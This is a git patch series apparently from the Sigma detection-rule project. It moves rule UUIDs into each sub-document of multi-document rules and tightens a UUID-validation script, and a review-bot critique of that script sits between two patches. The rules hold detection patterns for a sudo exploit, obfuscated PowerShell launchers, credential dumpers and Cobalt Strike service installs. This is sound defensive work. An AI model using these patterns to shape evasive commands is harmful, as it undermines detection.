b/rules/linux/lnx_sudo_cve_2019_14287.yml 
@@ -1,6 +1,5 @@ action: global title: Sudo Privilege Escalation CVE-2019-14287 -id: f74107df-b6c6-4e80-bf00-4170b658162b status: experimental description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 author: Florian Roth @@ -21,11 +20,13 @@ tags: - attack.t1169 # an old one - attack.t1548.003 --- +id: f74107df-b6c6-4e80-bf00-4170b658162b detection: selection_keywords: - '* -u#*' condition: selection_keywords --- +id: 7fcc54cb-f27d-4684-84b7-436af096f858 detection: selection_user: USER: diff --git a/rules/linux/lnx_system_info_discovery.yml b/rules/linux/lnx_system_info_discovery.yml index 892f10d7..f8b68956 100644 --- a/rules/linux/lnx_system_info_discovery.yml +++ b/rules/linux/lnx_system_info_discovery.yml @@ -1,6 +1,5 @@ action: global title: System Information Discovery -id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 status: stable description: Detects system information discovery commands author: Ömer Günal, oscd.community @@ -15,6 +14,7 @@ tags: - attack.discovery - attack.t1082 --- +id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 logsource: product: linux category: process_creation @@ -30,6 +30,7 @@ detection: - '/lsmod' condition: selection --- +id: 1f358e2e-cb63-43c3-b575-dfb072a6814f logsource: product: linux service: auditd diff --git a/rules/network/net_high_dns_bytes_out.yml b/rules/network/net_high_dns_bytes_out.yml index 630a8a71..babf0d21 100644 --- a/rules/network/net_high_dns_bytes_out.yml +++ b/rules/network/net_high_dns_bytes_out.yml @@ -1,6 +1,5 @@ action: global title: High DNS Bytes Out -id: 0f6c1bf5-70a5-4963-aef9-aab1eefb50bd status: experimental description: High DNS queries bytes amount from host per short period of time author: Daniil Yugoslavskiy, oscd.community @@ -14,6 +13,7 @@ tags: - attack.t1048 # an old one - attack.t1048.003 --- +id: 0f6c1bf5-70a5-4963-aef9-aab1eefb50bd logsource: category: dns detection: 
@@ -22,6 +22,7 @@ detection: timeframe: 1m condition: selection | sum(question_length) by src_ip > 300000 --- +id: 3b6e327d-8649-4102-993f-d25786481589 logsource: category: firewall detection: diff --git a/rules/network/net_high_dns_requests_rate.yml b/rules/network/net_high_dns_requests_rate.yml index 1e1d8f11..c870aacf 100644 --- a/rules/network/net_high_dns_requests_rate.yml +++ b/rules/network/net_high_dns_requests_rate.yml @@ -1,6 +1,5 @@ action: global title: High DNS Requests Rate -id: b4163085-4001-46a3-a79a-55d8bbbc7a3a status: experimental description: High DNS requests amount from host per short period of time author: Daniil Yugoslavskiy, oscd.community @@ -17,6 +16,7 @@ tags: - attack.t1071 # an old one - attack.t1071.004 --- +id: b4163085-4001-46a3-a79a-55d8bbbc7a3a logsource: category: dns detection: @@ -25,6 +25,7 @@ detection: timeframe: 1m condition: selection | count() by src_ip > 1000 --- +id: 51186749-7415-46be-90e5-6914865c825a logsource: category: firewall detection: diff --git a/rules/network/net_susp_network_scan.yml b/rules/network/net_susp_network_scan.yml index ae8770e6..a4032fda 100644 --- a/rules/network/net_susp_network_scan.yml +++ b/rules/network/net_susp_network_scan.yml @@ -1,6 +1,5 @@ action: global title: Network Scans -id: fab0ddf0-b8a9-4d70-91ce-a20547209afb status: experimental description: Detects many failed connection attempts to different ports or hosts author: Thomas Patzke @@ -21,12 +20,14 @@ tags: - attack.discovery - attack.t1046 --- +id: fab0ddf0-b8a9-4d70-91ce-a20547209afb detection: selection: action: denied timeframe: 24h condition: selection | count(dst_port) by src_ip > 10 --- +id: 4601eaec-6b45-4052-ad32-2d96d26ce0d8 detection: selection: action: denied diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index efd86f6e..8e4e79c8 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml 
@@ -26,6 +26,7 @@ falsepositives: - Unknown level: high --- +id: d1478dc2-fd6a-4154-a8fb-ba9a88a366e5 logsource: category: process_creation product: windows diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index 9f81e307..ca2308ab 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -1,6 +1,5 @@ action: global title: CobaltStrike Service Installations -id: 5a105d34-05fc-401e-8553-272b45c1522d description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement author: Florian Roth, Wojciech Lesicki references: @@ -34,6 +33,7 @@ falsepositives: - Unknown level: critical --- +id: 5a105d34-05fc-401e-8553-272b45c1522d logsource: product: windows service: system @@ -41,6 +41,7 @@ detection: selection_id: EventID: 7045 --- +id: d7a95147-145f-4678-b85d-d1ff4a3bb3f6 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml index 0b502851..6ba0e08f 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation CLIP+ Launcher -id: f7385ee2-0e0c-11eb-adc1-0242ac120002 description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' condition: selection and selection_eventid --- +id: f7385ee2-0e0c-11eb-adc1-0242ac120002 logsource: product: windows service: system 
@@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 21e4b3c1-4985-4aa4-a6c0-f8639590a5f3 logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 4edf51e1-cb83-4e1a-bc39-800e396068e3 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml index b76bdade..aa3cec10 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation Obfuscated IEX Invocation -id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" status: experimental author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community @@ -22,6 +21,7 @@ detection: - ImagePath|re: '\String\]\s*\$VerbosePreference' condition: selection and selection_1 --- +id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 logsource: product: windows service: system @@ -29,6 +29,7 @@ detection: selection: EventID: 7045 --- +id: e75c48bd-3434-4d61-94b7-ddfaa2c08487 logsource: product: windows category: driver_load @@ -36,6 +37,7 @@ detection: selection: EventID: 6 --- +id: fd0f5778-d3cb-4c9a-9695-66759d04702a logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml index 1345ea6c..0bebb79d 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml 
@@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation STDIN+ Launcher -id: 72862bf2-0eb1-11eb-adc1-0242ac120002 description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' condition: selection and selection_eventid --- +id: 72862bf2-0eb1-11eb-adc1-0242ac120002 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: de7fb680-6efa-4bf3-af2c-14b6d33c8e6e logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974 logsource: product: windows service: security diff --git a/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml b/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml index b8064b87..8b47fd5a 100644 --- a/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml +++ b/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml @@ -1,6 +1,5 @@ action: global title: Wmiprvse Wbemcomn DLL Hijack -id: 614a7e17-5643-4d89-b6fe-f9df1a79641c description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. status: experimental date: 2020/10/12 @@ -17,6 +16,7 @@ falsepositives: - Unknown level: critical --- +id: 614a7e17-5643-4d89-b6fe-f9df1a79641c logsource: product: windows category: file_event @@ -26,6 +26,7 @@ detection: TargetFilename|endswith: '\wbem\wbemcomn.dll' condition: selection --- +id: 7707a579-e0d8-4886-a853-ce47e4575aaa logsource: product: windows category: image_load diff --git a/tools/sigma/sigma_uuid.py b/tools/sigma/sigma_uuid.py index 9ec32b71..8875004b 100755 --- a/tools/sigma/sigma_uuid.py +++ b/tools/sigma/sigma_uuid.py 
@@ -7,6 +7,7 @@ from uuid import uuid4, UUID import yaml from sigma.output import SigmaYAMLDumper + def print_verbose(*arg, **kwarg): print(*arg, **kwarg) @@ -14,6 +15,17 @@ def print_verbose(*arg, **kwarg): def yaml_preserve_order(self, dict_data): return self.represent_mapping("tag:yaml.org,2002:map", dict_data.items()) +def valid_rule(rule,i,path): + try: + UUID(rule["id"]) + except ValueError: # id is not a valid UUID + print("Rule {} in file {} has a malformed UUID '{}'.".format(i, str(path), rule["id"])) + return False + except KeyError: # rule has no id + print("Rule {} in file {} has no UUID.".format(i, str(path))) + return False + return True + def main(): argparser = ArgumentParser(description="Assign and verify UUIDs of Sigma rules") argparser.add_argument("--verify", "-V", action="store_true", help="Verify existence and uniqueness of UUID assignments. Exits with error code if verification fails.") @@ -37,22 +49,32 @@ def main(): passed = True for path in paths: print_verbose("Rule {}".format(str(path))) - with path.open("r") as f: + with path.open("r",encoding="UTF-8") as f: rules = list(yaml.safe_load_all(f)) - + + nb_rule = len(rules) if args.verify: - i = 1 + if nb_rule == 1: + if not valid_rule(rules[0],1,path): passed = False + else: + if rules[0]["action"] == "global": + for i in range(1,nb_rule): + if not valid_rule(rules[i],i,path): passed = False + ''' for rule in rules: + if "title" in rule: # Rule with a title should also have a UUID try: UUID(rule["id"]) except ValueError: # id is not a valid UUID print("Rule {} in file {} has a malformed UUID '{}'.".format(i, str(path), rule["id"])) passed = False + exit() except KeyError: # rule has no id print("Rule {} in file {} has no UUID.".format(i, str(path))) passed = False - i += 1 + exit() + ''' else: newrules = list() changed = False From ac90ee0002895133550503ab1baa8b5a5498ac79 Mon Sep 17 00:00:00 2001 
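Review bot: In the verify branch `rules[0]["action"]` raises KeyError for any multi-document file whose first document has no `action` key, and when the key is present but not `global` the branch verifies nothing, so such files silently count as passed; an empty file (`rules == []`) now hits `rules[0]` with IndexError where the old `for rule in rules` loop tolerated it. `valid_rule` only catches ValueError, so an `id` that YAML parsed as a non-string (a bare number, a mapping) escapes as AttributeError/TypeError instead of being reported as malformed. The old loop kept inside the `'''` string should be deleted rather than carried as dead code. `main`'s body continues outside the hunk; the rewrite below touches only `valid_rule` and the verify branch.
```python
def valid_rule(rule, i, path):
    """Return True when document i of path has a well-formed UUID; otherwise print why and return False."""
    try:
        UUID(rule["id"])
    except KeyError:  # rule has no id
        print("Rule {} in file {} has no UUID.".format(i, str(path)))
        return False
    except (ValueError, AttributeError, TypeError):  # id missing, not a string, or not a UUID
        print("Rule {} in file {} has a malformed UUID '{}'.".format(i, str(path), rule["id"]))
        return False
    return True

# … unchanged: main() argument parsing, path collection, file reading …
            nb_rule = len(rules)
            if args.verify:
                if nb_rule == 0:
                    print_verbose("File {} contains no rule document, nothing to verify.".format(str(path)))
                elif nb_rule == 1:
                    if not valid_rule(rules[0], 1, path): passed = False
                elif rules[0].get("action") == "global":
                    # the global header carries no id of its own; every following document must
                    for i in range(1, nb_rule):
                        if not valid_rule(rules[i], i, path): passed = False
                else:
                    # multi-document file without a global header: every document needs an id
                    for i in range(nb_rule):
                        if not valid_rule(rules[i], i + 1, path): passed = False
            else:
                # … unchanged: rewrite mode assigning missing UUIDs …
```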
From: frack113 Date: Thu, 2 Sep 2021 20:23:23 +0200 Subject: [PATCH 0709/1367] Update global ID --- .../win_invoke_obfuscation_var+_services.yml | 4 +++- ...invoke_obfuscation_via_compress_services.yml | 4 +++- ...n_invoke_obfuscation_via_rundll_services.yml | 4 +++- ...in_invoke_obfuscation_via_stdin_services.yml | 4 +++- ...invoke_obfuscation_via_use_clip_services.yml | 4 +++- ...nvoke_obfuscation_via_use_mshta_services.yml | 4 +++- ...ke_obfuscation_via_use_rundll32_services.yml | 4 +++- ...in_invoke_obfuscation_via_var++_services.yml | 4 +++- rules/windows/builtin/win_mal_creddumper.yml | 5 +++-- .../builtin/win_mal_service_installs.yml | 3 ++- ...t_or_impacket_smb_psexec_service_install.yml | 17 +++++++++-------- ...altstrike_getsystem_service_installation.yml | 4 +++- rules/windows/builtin/win_moriya_rootkit.yml | 3 ++- 13 files changed, 43 insertions(+), 21 deletions(-) diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml index 366fea97..939ff725 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation VAR+ Launcher -id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 description: Detects Obfuscated use of Environment Variables to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' condition: all of them --- +id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 logsource: product: windows service: system @@ -28,10 +28,12 @@ detection: selection_eventid: EventID: 7045 --- +id: 3e27b010-2cf2-4577-8ef0-3ea44aaea0dc logsource: product: windows category: process_creation --- +id: dcf2db1f-f091-425b-a821-c05875b8925a logsource: product: windows service: security 
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml index 2ec58024..1b1b490f 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation COMPRESS OBFUSCATION -id: 175997c5-803c-4b08-8bb0-70b099f47595 description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' condition: selection and selection_eventid --- +id: 175997c5-803c-4b08-8bb0-70b099f47595 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: c70731dd-0097-40ff-b112-f7032f29c16c logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 7a922f1b-2635-4d6c-91ef-af228b198ad3 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml index e6925517..11317dda 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation RUNDLL LAUNCHER -id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community 
@@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' condition: selection and selection_eventid --- +id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 03b024c6-aad1-4da5-9f60-e9e8c00fa64c logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml index 01baa20f..4cc9ee79 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation Via Stdin -id: 487c7524-f892-4054-b263-8a0ace63fc25 description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' condition: selection and selection_eventid --- +id: 487c7524-f892-4054-b263-8a0ace63fc25 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 82b66143-53ee-4369-ab02-de2c70cd6352 logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 80b708f3-d034-40e4-a6c8-d23b7a7db3d1 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml index 701415bd..45b5d47b 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml 
+++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation Via Use Clip -id: 63e3365d-4824-42d8-8b82-e56810fefa0c description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' condition: selection and selection_eventid --- +id: 63e3365d-4824-42d8-8b82-e56810fefa0c logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 1fc02cb5-8acf-4d2c-bf9c-a28b6e0ad851 logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 1a0a2ff1-611b-4dac-8216-8a7b47c618a6 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml index ccdb7759..decfefb6 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation Via Use MSHTA -id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' condition: selection and selection_eventid --- +id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: a4e82ad2-7430-4ee8-b858-6ad6099773fa logsource: product: windows category: driver_load 
@@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml index 4c2297a6..a095343e 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation Via Use Rundll32 -id: 641a4bfb-c017-44f7-800c-2aee0184ce9b description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' condition: selection and selection_eventid --- +id: 641a4bfb-c017-44f7-800c-2aee0184ce9b logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 4e1518d9-2136-4015-ab49-c31d7c8588e1 logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: cd0f7229-d16f-42de-8fe3-fba365fbcb3a logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml index e042bb14..af6859b6 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION -id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community 
@@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r condition: selection and selection_eventid --- +id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 7b9a650e-6788-4fdf-888d-ec7c0a62810d logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_mal_creddumper.yml b/rules/windows/builtin/win_mal_creddumper.yml index 6a71474a..76cc287b 100644 --- a/rules/windows/builtin/win_mal_creddumper.yml +++ b/rules/windows/builtin/win_mal_creddumper.yml @@ -1,9 +1,7 @@ ---- action: global title: Credential Dumping Tools Service Execution description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community -id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed date: 2017/03/05 modified: 2021/03/18 references: @@ -44,6 +42,7 @@ falsepositives: - Legitimate Administrator using credential dumping tool for password recovery level: high --- +id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed logsource: product: windows service: system @@ -51,10 +50,12 @@ detection: selection: EventID: 7045 --- +id: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2 logsource: product: windows category: driver_load --- +id: f0d1feba-4344-4ca9-8121-a6c97bd6df52 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_mal_service_installs.yml b/rules/windows/builtin/win_mal_service_installs.yml index cf70185f..e5fcbbab 100644 --- a/rules/windows/builtin/win_mal_service_installs.yml +++ b/rules/windows/builtin/win_mal_service_installs.yml 
@@ -1,6 +1,5 @@ action: global title: Malicious Service Installations -id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) date: 2017/03/27 @@ -24,6 +23,7 @@ falsepositives: - Penetration testing level: critical --- +id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a logsource: product: windows service: system @@ -39,6 +39,7 @@ detection: malsvc_apt29: ServiceName: 'Java(TM) Virtual Machine Support Service' --- +id: cb062102-587e-4414-8efa-dbe3c7bf19c6 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml b/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml index 888c3dc9..6b61aec6 100644 --- a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml @@ -1,10 +1,9 @@ +action: global title: Metasploit Or Impacket Service Installation Via SMB PsExec -id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation author: Bartlomiej Czyz, Relativity date: 2021/01/21 modified: 2021/07/23 -action: global references: - https://bczyz1.github.io/2021/01/30/psexec.html tags: @@ -32,6 +31,7 @@ falsepositives: - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name level: high --- +id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 logsource: product: windows service: system 
@@ -39,10 +39,11 @@ detection: selection: EventID: 7045 --- - logsource: - product: windows - service: security - detection: - selection: - EventID: 4697 +id: 6fb63b40-e02a-403e-9ffd-3bcc1d749442 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4697 diff --git a/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml index 7e118373..0bd04b69 100644 --- a/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml +++ b/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml @@ -1,6 +1,5 @@ action: global title: Meterpreter or Cobalt Strike Getsystem Service Installation -id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation author: Teymur Kheirkhabarov, Ecco, Florian Roth date: 2019/10/26 @@ -48,6 +47,7 @@ falsepositives: - Highly unlikely level: critical --- +id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 logsource: product: windows service: system @@ -55,10 +55,12 @@ detection: selection: EventID: 7045 --- +id: d585ab5a-6a69-49a8-96e8-4a726a54de46 logsource: product: windows category: driver_load --- +id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_moriya_rootkit.yml b/rules/windows/builtin/win_moriya_rootkit.yml index 70636d9f..276d88f6 100644 --- a/rules/windows/builtin/win_moriya_rootkit.yml +++ b/rules/windows/builtin/win_moriya_rootkit.yml @@ -1,6 +1,5 @@ action: global title: Moriya Rootkit -id: 25b9c01c-350d-4b95-bed1-836d04a4f324 description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report status: experimental author: Bhabesh Raj 
@@ -16,6 +15,7 @@ tags: - attack.privilege_escalation - attack.t1543.003 --- +id: 25b9c01c-350d-4b95-bed1-836d04a4f324 logsource: product: windows service: system @@ -25,6 +25,7 @@ detection: ServiceName: ZzNetSvc condition: selection --- +id: a1507d71-0b60-44f6-b17c-bf53220fdd88 logsource: product: windows category: file_event From f90c7558a78d0766cf5686595609f45e2e071c09 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 21:03:25 +0200 Subject: [PATCH 0710/1367] update global id --- .../builtin/win_powershell_script_installed_as_service.yml | 4 +++- rules/windows/builtin/win_software_discovery.yml | 3 ++- .../network_connection/sysmon_regsvr32_network_activity.yml | 3 ++- rules/windows/other/win_defender_disabled.yml | 6 ++++-- rules/windows/other/win_tool_psexec.yml | 5 ++++- rules/windows/other/win_wmi_persistence.yml | 3 ++- .../sysmon_abusing_windows_telemetry_for_persistence.yml | 3 ++- rules/windows/sysmon/sysmon_pingback_backdoor.yml | 4 +++- 8 files changed, 22 insertions(+), 9 deletions(-) diff --git a/rules/windows/builtin/win_powershell_script_installed_as_service.yml b/rules/windows/builtin/win_powershell_script_installed_as_service.yml index 01652c7c..6ebf00e9 100644 --- a/rules/windows/builtin/win_powershell_script_installed_as_service.yml +++ b/rules/windows/builtin/win_powershell_script_installed_as_service.yml @@ -1,6 +1,5 @@ action: global title: PowerShell Scripts Installed as Services -id: a2e5019d-a658-4c6a-92bf-7197b54e2cae description: Detects powershell script installed as a Service status: experimental author: oscd.community, Natalia Shornikova @@ -21,6 +20,7 @@ falsepositives: - Unknown level: high --- +id: a2e5019d-a658-4c6a-92bf-7197b54e2cae logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: service_creation: EventID: 7045 --- +id: 46deb5e1-28c9-4905-b2df-51cdcc9e6073 logsource: product: windows service: sysmon 
